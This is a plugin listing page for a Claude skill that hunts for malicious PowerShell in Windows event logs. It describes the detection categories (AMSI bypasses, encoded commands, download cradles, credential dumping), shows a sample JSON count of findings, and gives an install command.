Stats
Actions
Tags
From cybersecurity-skills
Analyzes Windows EVTX files to detect malicious PowerShell activity including obfuscated commands, AMSI bypasses, encoded payloads, and credential dumping via Script Block Logging (Event 4104).
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersecurity-skills:hunting-for-anomalous-powershell-executionThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
PowerShell Script Block Logging (Event ID 4104) records the full deobfuscated script text
PowerShell Script Block Logging (Event ID 4104) records the full deobfuscated script text executed on a Windows endpoint, making it the primary data source for hunting malicious PowerShell. Combined with Module Logging (4103) and process creation events, analysts can detect encoded commands, AMSI bypass patterns, download cradles, credential theft tools, and fileless attack techniques even when the attacker uses obfuscation layers.
{
"total_events": 1247,
"suspicious_events": 23,
"amsi_bypass_attempts": 2,
"encoded_commands": 8,
"download_cradles": 5,
"credential_access": 3
}
npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skillsAnalyzes Windows EVTX files to detect malicious PowerShell activity including obfuscated commands, AMSI bypasses, encoded payloads, and credential dumping via Script Block Logging (Event 4104).
Parses Windows EVTX files for malicious PowerShell via Event 4104/4103 logs, detecting AMSI bypasses, obfuscated commands, encoded payloads, credential dumping, and download cradles. For threat hunting and incident analysis.
Analyzes Windows EVTX event logs to detect malicious PowerShell activity, including obfuscated commands, AMSI bypasses, encoded payloads, and credential dumping.